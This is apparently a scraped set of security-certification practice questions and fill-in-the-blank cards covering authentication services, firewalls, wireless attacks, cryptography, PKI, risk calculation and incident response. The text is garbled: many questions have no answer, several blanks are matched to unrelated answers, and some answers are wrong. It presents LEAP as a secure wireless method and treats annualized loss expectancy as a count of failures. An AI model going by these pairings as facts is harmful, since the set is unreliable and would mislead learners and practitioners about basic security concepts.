Your organization issues laptops to mobile users. Administrators configured these laptops with full disk encryption, which requires users to enter a password when they first turn on the computer. After the operating system loads, users are required to log on with a username and password. Which of the following choices BEST describes this?
Security Assertion Markup Language (SAML) is an Extensible Markup Language (XML) used for ___________.
single sign-on (SSO)
Users at your organization currently use a combination of smart cards and passwords, but an updated security policy requires multifactor security using three different factors. Which of the following can you add to meet the new requirement?
Fingerprint readers would add ___________ from the something you are factor of authentication.
A network includes a tick-granting ticket server used for authentication. What authentication service does this network use?
_____________ is an authentication service created by Cisco.
Terminal Access Controller Access-Control System Plus (TACACS+)
_________________ is an X.500-based authentication service that can be secured with Transport Layer Security (TLS).
Lightweight Directory Access Protocol (LDAP)
You are modifying a configuration file used to authenticate Unix accounts against an external server. The file includes phrases such as DC=Server1 and DC=Com. Which authentication service is the external server using?
Lightweight Directory Access Protocol (LDAP)
Which of the following choices is an AAA protocol that uses shared secrets as a method of security?
_____________ is an authentication, authorization, and accounting (AAA) protocol that uses shared secrets (or passwords) for security.
Remote Authentication Dial-In User Service (RADIUS)
Your organization wants to reduce the amount of money it is losing due to thefts. Which of the following is the BEST example of an equipment theft deterrent?
A manager recently observed an unauthorized person in a secure area, which is protected with a cipher lock door access system. After investigation, he discovered that an authorized employee gave this person the cipher lock door. Which of the following is the BEST response to this issue at the minimum cost?
provide security awareness training
Management recently rewrote the organization's security policy to strengthen passwords created by users. It now states that passwords should support special characters. Which of the following choices is the BEST setting to help the organization achieve this goal?
You have discovered that some users have been using the same passwords for months, even though the password policy requires users to change their password every 30 days. You want to ensure that users cannot reuse the same password. Which settings should you configure?
password history and minimum password age
The ________________ setting records previously used passwords to prevent users from reusing the same passwords.
Using password history setting combined with the ___________________ setting prevents users from changing their password repeatedly to get back to their original password.
minimum password age
The ___________ setting ensures users change their passwords regularly.
maximum password age
A company recently hired you as a security administrator. You notice that some former accounts used by temporary employees are currently enabled. Which of the following choices is the BEST response?
Craft a script to identify inactive accounts based on the last time they logged on.
Running a _________________ allows you to identify inactive accounts, such as accounts that haven't been logged on to in the last 30 days.
last logon script
An organization supports remote access, allowing users to work from home. However, management wants to ensure that personnel cannot log on to work systems from home during weekends and holidays. Which of the following BEST supports this goal?
You configure access control for users in your organization. Some departments have a high employee turnover, so you want to simplify account administration. Which of the following is the BEST choice?
Group-based privileges is a form of ________________ and it simplifies administration. Instead of assigning permissions to new employees individually, you can just add new employee user accounts into the appropriate groups to grant them the rights and permissions they need for the job.
role-based access control
_________________ require you to manage privileges for each user separately, and it increases the account administration burden.
You are configuring a file server used to share files and folders among employees within your organization. However, employees should not be able to access all folders on this server. Which of the following choices is the BEST method to manage security for these folders?
use security groups with appropriate permissions
You can create security groups, place users into these groups, and grant access to the folders by assigning appropriate permissions to the security groups. For example, the security groups might be Sales, Marketing, and HR, and you place users into the appropriate group based on their job. This is an example of using ________________.
The Retirement Castle uses groups for ease of administration and management. They recently hired Jasper as their new accountant. Jasper needs access to all the files and folders used by the Accounting department. What should the administrator do to give Jasper appropriate access?
Create an account for Jasper and add the account to the Accounting group
Your organization recently updated its security policy and indicated that Telnet should not be used within the network. Which of the following should be used instead of Telnet?
Secure Copy (SCP) and Secure File Transfer Protocol (SFTP) use ______ to encrypt files sent over the network.
One of your web servers was recently attacked and you have been tasked with reviewing firewall logs to see if you can determine how an attacker accessed the system remotely. You identified the following port numbers in log entries: 21, 22, 25, 53, 80, 110, 443, and 3389. Which of the following protocols did the attacker MOST likely use?
You are reviewing logs from a wireless survey within your organization's network due to a suspected attack and you notice the following entries:
MAC SSID Encryption Power
12: AB: 34: CD: 56: EF GetCertifiedGetAhead WPA2 47
12: AB: 34: CD: 56: EF GetCertifiedGetAhead WPA2 62
56: CD: 34: EF: 12: AB GetCertifiedGetAhead WPA2 20
12: AB: 34: CD: 56: EF GetCertifiedGetAhead WPA2 57
12: AB: 34: CD: 56: EF GetCertifiedGetAhead WPA2 49
Of the following choices, what is the MOST likely explanation of these entries?
An evil twin is in place.
Which of the following provides the largest address space?
While analyzing a firewall log, you notice traffic going out of your network on UDP port 53. What does this indicate?
Domain Name System (DNS) traffic uses ____________ by default to resolve host names to IP addresses.
UDP port 53
Secure File Transfer Protocol (SFTP) uses _________.
A team of users in your organization needs a dedicated subnet. For security reasons, other users should not be able to connect to this subnet. Which of the following choices is the BEST solution?
restrict traffic based on physical addresses
To restrict traffic based on physical addresses, also called ___________________ configure on a switch.
MAC address filtering
_________________ monitors and manages network devices.
An organization recently updated its security policy. A new requirement dictates a need to increase protection from rogue devices plugged into physical ports. Which of the following choices provides the BEST protection?
_________________ is a port-based authentication protocol and it requires systems to authenticate before they are granted access to the network. If an attacker plugged a rogue device into a physical port, the 802.1x server would block it from accessing the network. MAC limiting and filtering provides some protection against rogue devices, but an 802.1x server provides much stronger protection.
What would administrators typically place at the end of an ACL of a firewall.
Administrators would place an implicit deny rule at the end of an access control list (ACL) to deny all traffic that hasn't been _________________. Many firewalls place this rule at the end by default.
An _________________ explicitly allows all traffic and defeats the purpose of a firewall.
allow all all rule
Your organization wants to protect its web server from cross-site scripting attacks. Which of the following choices provides the BEST protection?
web application firewall (WAF)
A _________________ is an Application layer firewall designed specifically to protect web servers. Although host-based and network-based firewalls provide protection, they aren't necessarily Application layer firewalls, so they do not provide the same level of protection for a web server.
web application firewall (WAF)
Management recently learned that several employees are using the company network to visit gambling and gaming web sites. They want to implement a security control to prevent this in the future. Which of the following choices would meet this need?
Unified Threat Management (UTM)
A unified threat management (UTM) typically includes a _________________ and can block access to web sites, just as a proxy server can block access to web sites.
_________________ operates on Layer 7 of the OSI model?
secure copy (SCP)
_________________ protocol operates on Layer 3 of the OSI model?
_________________ operates on Layer 4 of the OSI model?
_________________ operates on Layer 2 of the OSI model?
Which of the following BEST describes a false negative?
An IDS does not detect a buffer overflow attack.
If an IDS falsely indicates an attack occurred, it is a __________.
A locked door that opens after a power failure is designed to ___________.
Company management suspects an employee is stealing critical project information and selling it to a competitor. They would like to identify who is doing this, without compromising any live data. What is the BEST option to meet this goal?
Add fabricated project data on a honeypot.
Attackers frequently attack your organization, and administrators want to learn more about zero-day attacks on the network. What can they use?
Security personnel recently noticed a successful exploit against an application used by many employees at their company. They notified the company that sold them the software and asked for a patch. However, they discovered that a patch wasn't available. What BEST describes this scenario?
What type of encryption is used with WPA2 CCMP?
Wi-Fi Protected Access II (WPA2) with Counter Mode Cipher Block Chaining Message Authentication Code Protocol (CCMP) uses _____________.
Advanced Encryption Standard (AES)
Temporal Key Integrity Protocol (TKIP) and Secure Sockets Layer (SSL) both use __________.
Rivest Cipher 4 (RC4)
Administrators in your organization are planning to implement a wireless network. Management has mandated that they use a RADIUS server and implement a secure wireless authentication method. Which should they use?
Lightweight Extensible Authentication Protocol (LEAP)
Which of the following wireless security mechanisms is subject to a spoofing attack?
MAC address filtering
MAC address filtering is vulnerable to _____________ because attackers can easily change MAC addresses on network interface cards (NICs).
Wired Equivalency Privacy (WEP) can be cracked using an ______________ attack.
initialization vector (IV)
_____________ requires users to enter credentials, so it isn't susceptible to a spoofing attack.
Which of the following is the BEST description of why disabling SSID broadcast is not an effective security measure against attackers?
The network name is contained in wireless packets in plaintext.
Mobile users in your network report that they frequently lose connectivity with the wireless network on some days, but on other days they don't have any problems. Which of the following types of attacks could cause this?
An _________ is a rogue wireless access point with the same service set identifier (SSID) as a live wireless access point.
A wireless jamming attack is a type of ____________ attack that can cause wireless devices to lose their association with access points and disconnect them from the network.
An initialization vector (IV) is a specific type of attack on Wired Equivalency Privacy (WEP) to ____________.
crack the key
A ____________ captures traffic with the goal of replaying it later to impersonate one of the parties of the original transmission.
Management within your organization wants some users to be able to access internal network resources from remote locations. Which of the following is the BEST choice to meet this need?
You suspect that an executable file on a web server is malicious and includes a zero-day exploit. Which of the following steps can you take to verify your suspicions?
Perform an operating system baseline comparison
An _____________________ can verify if a file is in your baseline or was added after the server was deployed.
operating system baseline comparison
Lisa has scanned all the user computers in the organization as part of a security audit. She is creating an inventory of these systems, including a list of applications running on each computer and the application versions. What is she MOST likely trying to identify?
Administrators create a list of applications installed on systems as part of an application baseline, also called a ______________.
Host software baseline
A _____________ looks for vulnerabilities within code, applications are compiled so the code is not easily available for review.
An ____________ looks at applications, protocols, and services.
An updated security policy identifies authorized applications for company-issued mobile devices. Which of the following would prevent users from installing other applications on these devices?
________________ are used with routers, firewalls, and files, but do not restrict installation of applications.
A company is implementing a feature that allows multiple servers to operate on a single physical server. What is this?
_____________ refers to accessing computing resources via a different location than your local computer.
______________ is a cloud computing option where the vendor provides access to a computer, but customers manage it.
Infrastructure as a Service (IAAS)
___________________ techniques examine and inspect data looking for unauthorized data transmissions.
data loss prevention (DLP)
A software vendor recently developed a patch for one of its applications. Before releasing the patch to customers, the vendor needs to test it in different environments. Which of the following solutions provides the BEST method to test the patch in different environments?
A virtualized sandbox provides a simple method of testing patches and would be used with _____________ so that the virtual machine (VM) can be easily reverted to the original state.
Your company has recently standardized servers using imaging technologies. However, a recent security audit verified that some servers were immune to known OS vulnerabilities, whereas other systems were not immune to the same vulnerabilities. Which of the following would reduce these vulnerabilities?
_____________ ensure operating systems (OS) are kept up to date with current patches. Patches ensure systems are immune to known vulnerabilities.
Patch management procedures
Someone stole an executive's smartphone, and the phone includes sensitive data. What should you do to prevent the thief from reading the data?
use remote wipe
_____________ can send a remote wipe signal to the phone to delete all the data on the phone, including any cached data.
Remote wipe capabilities
Your organization has issued mobile devices to several key personnel. These devices store sensitive information. What can administrators implement to prevent data loss from these devices if they are stolen?
full device encryption, screen lock, account lockout, and remote wipe capabilities
Home wants to ensure that other people cannot view data on his mobile device if he leaves it unattended. What should he implement?
Management wants to implement a system that will provide automatic notification when personnel remove devices from the building. Which of the following security controls will meet this requirement?
Radio-frequency identification (RFID)
Radio-frequency identification (RFID) provides _____________ and can detect movement of devices.
automated inventory control
_____________ provides geographic location for pictures posted to social media sites.
Your organization was recently attacked, resulting in a data breach, and attackers captured customer data. Management wants to take steps to better protect customer data. Which of the following will BEST support this goal?
Stronger access controls and encryption
Strong access controls and encryption are two primary methods of protecting the _____________ of any data, including customer data.
A business owner is preparing to decommission a server that has processed sensitive data. He plans to remove the hard drives and send them to a company that destroys them. However, he wants to be certain that personnel at that company cannot access data on the drives. Which of the following is the BEST option to meet this goal?
full disk encryption or disk wiping procedures to erase the data
_____________ identifies how long to keep data.
_____________ can be very tedious and won't necessarily encrypt all of the sensitive data on a hard drive.
Your organization is considering the purchase of new computers. A security professional stresses that these devices should include Trusted Platform Module (TPMs). What benefit does a TPM provide?
uses hardware encryption and stores RSA encryption keys
A _____________ is a hardware chip that stores RSA encryption keys and hardware encryption.
Trusted Platform Module (TPM)
A Trusted Platform Module (TPM) does not use _____________ encryption.
A hardware security module (HSM) is a removable hardware disk that uses _____________, but it does not have a file system Trusted Platform Module (TPM) does not provide HSM as a benefit.
What function does an HSM include?
Generates and stores keys used with servers
A _____________ is a removable device that can generate and store RSA keys used with servers for data encryption.
hardware security module (HSM)
Homer installed code designed to enable his account automatically, three days after someone disables it. What did Homer create?
backdoor using a logic bomb
______________ include hidden processes, but they do not activate in response to events.
An ______________ uses techniques to make it difficult for researchers to reverse engineer it.
Your local library is planning to purchase new computers that patrons can use for Internet research. What can be used to protect these computers?
anti-malware software and cable locks
Your organization has been receiving a significant amount of spam with links to malicious web sites. You want to stop the spam.
Add the domain to a block list
A _____________ blocks outgoing traffic and can be used to block the links to the malicious web sites, but it doesn't stop spam email from coming in.
Attackers have launched an attack using multiple systems against a single target. What type of attack is this?
A _____________ is an example of a DoS attack.
A __________ is a type of DoS attack that attempts to write data into an application's memory.
Security administrators are reviewing security controls and their usefulness. Which of the following attacks will account lockout controls prevent?
brute force and dictionary attacks
__________ attempts to redirect web browsers to malicious URLs.
A web developer wants to reduce the chances of an attacker successfully launching cross-site request forgery (XSRF) attacks against a web site application. What can provide protection against this attack?
server-side input validation
__________ input using server-side input validation can restrict the use of special characters needed in cross-site request forgery (XSRF) attacks. Client-side input validation can be combined with server-side validation, but it can be bypassed and should not be used alone.
Validating and filtering
A web developer is adding input validation techniques to a web site application. Which of the following should the developer implement during this process?
perform the validation on the server side
Boundary or limit checks are an important part of _________.
An attacker is attempting to write more data into a web application's memory than it can handle. What type of attack is this?
One type of ________ attempts to write more data in an application's memory than it can handle.
buffer overflow attack
A ________ attempts to launch attacks with HTML code.
cross-site request forgery (XSRF)
________ attempts to query directory service databases such as Microsoft Active Directory.
Lightweight Directory Application Protocol (LDAP)
________ inputs random data into an application during testing.
During a penetration test, a tester injected extra input into an application causing the application to crash. What does this describe?
Fuzzing or fuzz testing sends ________ to an application to test it. Ideally, the application can handle the extra input, but it is possible that fuzz testing causes an application to crash.
A security expert is attempting to identify the number of failures a web server has in a year. Which of the following is the expert MOST likely identifying?
Annualized loss expectancy (ALE)
Annualized loss expectancy (ALE) is part of a ________. It is calculated by multiplying the single loss expectancy times the annualized rate of occurrence (ARO).
quantitative risk assessment
You are trying to add additional security controls for a database server that includes customer records and need to justify the cost of $1,000 for these controls. The database includes 2,500 records. Estimates indicate a cost of $300 for each record if an attacker successfully gains access to them. Research indicates that there is a 10% possibility of a data breach in the next year. What is the ALE?
$75,000 (SLE is $750,000 [2,500 x $300] ARO is 10%)
A penetration tester is tasked with gaining information on one of your internal servers and he enters the following command: telnet server1 80. What is the purpose of this command?
Identify if server1 is running a service using port 80 and is reachable.
________ is a common beginning command for a banner grabbing attempt.
telnet server1 80
A recent vulnerability assessment identified several issues related to an organization's security posture. Which of the following issues is MOST likely to affect the organization on a day-to-day basis?
lack of malware software
________ is a constant threat and without antivirus software, systems are sure to become infected in a short period of time.
Which of the following tools would a security administrator use to identify misconfigured systems within a network?
A vulnerability scan checks systems for potential vulnerabilities, including vulnerabilities related to ________.
A penetration test can identify misconfigured systems, it also attempts to ________ on those systems and isn't appropriate if you only want to identify the systems.
A security expert is running tests to identify the security posture of a network. However, these tests are not exploiting any weaknesses. Which of the following types of test is the security expert performing?
Which of the following tools is the LEAST invasive and can verify if security controls are in place?
A vulnerability scan identifies the ________ of a network but it does not actually exploit any weaknesses.
A ________is not invasive and does not determine if security controls are in place.
________ identifies hosts on a network.
Your organization develops web application software, which it sells to other companies for commercial use. To ensure the software is secure, your organization uses a peer assessment to help identify potential security issues related to the software. Which of the following is the BEST term for this process?
Peers, such as other developers, perform code reviews going line-by-line through the software code looking for vulnerabilities, such as ________.
buffer overflows and race conditions
Your organization plans to deploy new systems within the network within the next six months. What should your organization implement to ensure these systems are developed properly?
A ________ ensures that systems and software are developed properly.
A ________ identifies changes from the initial baseline configuration, but is not done on systems that aren't' deployed yet.
Identifying the ________, including the required protocols and services, would likely be part of the design review.
You need to periodically check the configuration of a server and identify any changes. What are you performing?
Your organization hired an external security expert to test a web application. The security expert is not given any access to the application interfaces, code, or data. What type of test will the security expert perform?
A security administrator needs to inspect protocol headers of traffic sent across the network. What tool is the BEST choice for this task?
protocol analyzer or sniffer
You are troubleshooting issues between two servers on your network and need to analyze the network traffic. Of the following choices, what is the BEST choice?
You are troubleshooting issues between two servers on your network and need to analyze the network traffic. A protocol analyzer would be the BEST choice to capture and analyze network traffic. Although the traffic probably goes through a ________, it doesn't capture the traffic in such a way that you can analyze it.
Which of the following is the lowest cost solution for fault tolerance?
A RAID subsystem is a relatively low-cost solution for _______ for disks.
You need to modify the network infrastructure to increase availability of web-based applications for Internet clients. Which of the following choices provides the BEST solution?
_______ increase the availability of web-based solutions by spreading the load among multiple servers.
A _______ system protects internal resources from attacks, but does not directly increase the availability of web-based applications.
unified threat management (UTM)
_______ is one of the features of a unified threat management (UTM), and it protects internal clients, but does not directly increase the availability of web-based applications.
A security analyst is creating a document that includes the expected monetary loss from a major outage. She is calculating the potential lost sales, fines, and impact on the organization's customers. Which of the following documents is she MOST likely creating?
business impact analysis (BIA)
A business impact analysis (BIA) includes identifies critical systems and components and information on potential monetary losses and is included in a _______.
business continuity plan (BCP)
A _______ includes methods used to recover from an outage and includes a list of systems to recover in hierarchical order.
disaster recovery plan (DRP)
The _______ refers to the amount of data you can afford to lose but does not include monetary losses.
recovery point objective (RPO)
Your organization is updating its business continuity documents. You're asked to review the communications plans for possible updates. Which of the following should you ensure is included in the communications plan?
methods used to respond to media requests, including templates
A _______ will include methods used to respond to media requests, including basic templates. It would also include methods used to communicate with response team members, employees, suppliers, and customers.
What type of encryption does the RADIUS protocol use?
Your organization is planning to implement videoconferencing, but it wants to protect the confidentiality of the streaming video. Which of the following would BEST meet this need?
RC4 is a symmetric encryption _______ which is often the best choice for encrypting data of an unknown size, such as streaming video.
An organization is implementing a PKI and plans on using public and private keys. Which of the following can be used to create strong key pairs?
Rivest, Shamir, Adleman (RSA) is used to create key pairs
MD5 and HMAC are _______.
AES is a _______ encryption algorithm.
Your organization is investigating possible methods of sharing encryption keys over a public network. Which of the following is the BEST choice?
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE)
Elliptic Curve Diffie-Hellman Ephemeral (ECDHE) allows entities to negotiate _______ securely over a public network.
You need to ensure data sent over an IP-based network remains confidential. Which of the following provides the BEST solution?
transport encryption such as IPsec
A user wants to hide confidential data within a .jpg file. What could they use to achieve this?
Personnel within your company are assisting an external auditor perform a security audit. They frequently send documents to the auditor via email and some of these documents contain confidential information. Management wants to implement a solution to reduce the possibility of unintentionally exposing this data. Which of the following is the BEST choice?
Encrypt all outbound email containing confidential information
_______ provide proof of who sent an email, but don't protect confidentiality.
Which two protocols provide strong security for the Internet with the use of certificates?
SSL and TLS
Lenny and Carl work in an organization that includes a PKI. Carl needs to send a digitally signed file to Lenny. What does Carl use in this process?
Carl's private key
If Carl needs to send a digitally signed file to Lenny, Carl would use his private key. Lenny would use Carl's _______ to decrypt the digital signature.
Bart recently sent out confidential data via email to potential competitors. Management suspects he did so accidentally, but Bart denied sending the data. Management wants to implement a method that would prevent Bart from denying accountability in the future. What are they trying to enforce?
Non-repudiation methods such as _______ prevent users from denying they took an action.
An organization is planning to implement an internal PKI for smart cards. Which of the following should the organization do FIRST?
install a certificate authority (CA)
A PKI requires a certificate authority (CA). Smart cards require certificates and would be issued by the CA. After installing the CA, you can generate _______ to be used with certificates issued by the CA.
Which of the following is a valid reason to use a wildcard certificate?
reduce the administrative burden of managing certificates
A _______ reduces the certificate management burden by using an asterisk (*) in place of child domain names. The certificate still has a single public and private key pair. The lifetime of the certificate isn't affected.
Homer works as a contractor at a company on a one-year renewing contract. After renewing his contract, the company issues him a new smart card. However, he is now having problems digitally signing email or opening encrypted email. What is MOST likely the solution?
publish the certificate in his new smart card
When a new smart card is issued, the certificate in the smart card needs to be published in a _______ within the domain. It is not possible for users to copy a certificate, public key, or private key to a smart card.
global address list
You need to request a certificate for a web server. Which of the following would you MOST likely use?
certificate signing request (CSR)
A certificate signing request (CSR) uses a specific format to request a certificate. You submit the CSR to a _______ in the CSR format.
Certificate Authority (CA)
An organization is implementing a data policy and wants to designate a recovery agent. Which of the following indicates what a recovery agent can do?
a recovery agent can decrypt data if users lose their private key
Recovery agents can decrypt data and messages if users lose their _______. Public keys are public available, so recovery agents aren't needed to retrieve them.
An organizational policy specifies that duties of application developers and administrators must be separated. What is the MOST likely result of implementing this policy?
one group develops program code and the other group deploys the code
An example of a _______ is where the application developers create and modify code and the administrators deploy the code to live production systems, but neither group can perform both functions. Developers would typically develop the original code, and modify it when necessary.
separation of duties
Application developers in your organization currently update applications on live production servers when needed. However, they do not follow any predefined procedures before applying the updates. What should the organization implement to prevent any risk associated with this process?
A _______ ensures that changes are approved before being implemented and would prevent risks associated with unintended outages.
change management process
Which of the following is a type of media that allows the mass distribution of personal comments to specific groups of people?
Social media and peer-to-peer sites are a potential risk to organizations due to possible _______.
Your organization wants to prevent damage from malware. Which stage of the common incident response procedures is the BEST stage to address this?
You are reviewing incident response procedures related to the order of volatility. Which of the following is the LEAST volatile?
hard disk drive
Security personnel confiscated a user's workstation after a security incident. Administrators removed the hard drive for forensic analysis, but left it unattended for several hours before capturing an image. What could prevent the company from taking the employee to court over this incident?
a chain of custody was not maintained